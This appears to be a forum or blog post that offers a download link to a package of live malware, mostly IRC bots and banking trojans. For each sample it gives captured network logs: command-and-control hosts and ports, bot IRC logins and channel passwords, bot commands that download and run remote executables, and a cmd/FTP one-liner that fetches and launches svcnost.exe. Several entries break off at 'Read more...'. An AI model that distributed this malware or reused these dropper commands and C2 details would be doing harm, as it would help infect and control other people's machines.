this is another package with diferent malwares mostly irc bots banking trojans etc Download: http://0cc80bc0.goneviral.com

Remote Host Port Number 213.251.170.52 80 64.62.181.43 80 77.79.4.159 1866 PASS ngrBot or PASS xxx NICK n{US|XPa}mhewugg USER mhewugg 0 0 :mhewugg JOIN #!hot! ngrBot PRIVMSG #!hot! :[HTTP]: Updated HTTP spread interval to “3” PRIVMSG #!hot! :[MSN]: Updated MSN spread interval to “4” PRIVMSG #!hot! :[d=”http://64.62.181.43/dalnets/gaylord.exe” s=”94720 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.tmp” –Read more...

fafaffy.no-ip.biz 71.170.141.132 Outgoing connection to remote server: fafaffy.no-ip.biz TCP port 517 exe file: http://01dd3f31.goneviral.com infos about hecker: http://whois.domaintools.com/71.170.141.132

bt1.divalium.com 205.234.236.13 Outgoing connection to remote server: bt1.yakizzy.com TCP port 7654 Remote Host Port Number 109.109.131.201 80 213.251.170.52 80 205.234.236.13 7654 PASS ngrBot NICK n{US|XPa}hevmduk USER hevmduk 0 0 :hevmduk JOIN #oldgold noKIDs PRIVMSG #oldgold :[d=”http://raystewart.biz/banners/32.exe” s=”163840 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataFdxaxf.exe” – Download retries: 0 infos about hosting: http://whois.domaintools.com/205.234.236.13

Remote Host Port Number 192.168.62.2 445 69.10.52.149 80 74.206.242.164 80 91.201.66.5 1234 NICK [N00_USA_XP_8141634]x MODE [N00_USA_XP_8141634]x A -ix JOIN #a1 PRIVMSG [N00_USA_XP_8141 @ :download; File download: 76.5KB to: C:up2.exe @ 76.5KB/sec. PRIVMSG #spam :HTTP SET http://black-cash.com/a11.exe @ :download; Created process: “C:up2.exe”, PID: @ :scan; Sequential Port Scan started on 192.168.62.0:445 with a delay of 3Read more...

erofolio.no-ip.biz 96.37.234.231 127.0.0.1 127.0.0.1 Outgoing connection to remote server: erofolio.no-ip.biz TCP port 79 Outgoing connection to remote server: 127.0.0.1 TCP port 79 IRCD server inside: erofolio.no-ip.biz 96.37.234.231 Outgoing connection to remote server: erofolio.no-ip.biz TCP port 6667 Chanels: #ganja #test NICK New|USA|1244024|XP USER 0685714 “” “lol” :0685714 JOIN #test PRIVMSG #test :DoWnLoaDeD & ExECuTeD! home ipRead more...

178.239.57.79:6567 Nick: [SI|AUT|00|P|13931] Username: XP-1861 Server Pass: s1m0n3t4 Joined Channel: #nil# with Password c1rc0dusoleil Channel Topic for Channel #nil#: “.desfi http://img104.herosh.com/2011/04/07/732104231.gif c:WINDOWSsystm.exe 1” Private Message to Channel #nil#: “[Dl]: File download: 100.0KB to: c:WINDOWSsystm.exe @ 50.0KB/sec.” Private Message to Channel #nil#: “[Dl]: Created process: “c:WINDOWSsystm.exe”, PID: “ infos about hosting: http://whois.domaintools.com/178.239.57.79

iexplorer.yi.org:6667 nick=O|XP|0-1|EFYRZ anick=U|0-1|K8Mh6 chanels: n0=#explorer n1=#BotLand n2=#BotLand,cCTeam n3=#Establish,cCTeam !cmd /c echo open cCTeamFtp.yi.org 21 >> ik &echo user ccteam10 765824 >> ik &echo binary >> ik &echo get svcnost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svcnost.exe &exit infos about hosting: http://whois.domaintools.com/216.210.179.67

Remote Host Port Number 173.242.123.150 2222 PASS google_l0[N5_1]xk-t.tmp 67.212.77.13 80 74.102.33.220 82 JOIN #Mohamed NICK {N}|USA|XP|COMPUTERNAME|058197 USER dpamqi “” “yggj” :COMPUTERNAME PRIVMSG #Mohamed :New Servant. * Now talking in #Mohamed * |HUN|PC|424794 (jwhejb@hideme-54F88E80.pool.invitel.hu) has joined #Mohamed http://adf.ly/17NrU Visited! * |FRA|XP|417579 (ugvfbm@5BB43577.39EEB631.99A5F1C9.IP) has joined #Mohamed http://adf.ly/17NrT Visited! http://adf.ly/17NrR Visited! http://adf.ly/17NrT Visited! http://adf.ly/17NrU Visited! http://adf.ly/17NrU Visited! http://adf.ly/17NrURead more...

Remote Host Port Number 213.246.113.100 81 NICK n[USA|XP|COMPUTERNAME]dlewojc USER n “” “lol” :n JOIN #bob# infos about hosting: http://whois.domaintools.com/213.246.113.100